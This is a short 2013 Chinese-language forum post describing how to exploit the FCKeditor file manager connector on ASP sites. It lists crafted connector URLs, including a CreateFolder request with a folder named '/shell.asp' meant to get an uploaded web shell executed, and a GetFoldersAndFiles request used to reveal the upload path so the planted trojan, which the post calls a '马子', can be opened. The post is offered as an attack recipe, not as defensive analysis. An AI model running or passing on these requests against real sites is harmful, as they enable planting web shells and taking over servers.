admin 发表于 2013-10-17 19:37:28

fckeditor找上传路径方法

网上流行着是上传是这样子的

http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

上传后老找不到路径,测了一下,我发现

FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

可以爆出路径,显示以下内容


得出路径,直接打开就见到马子
页: [1]
查看完整版本: fckeditor找上传路径方法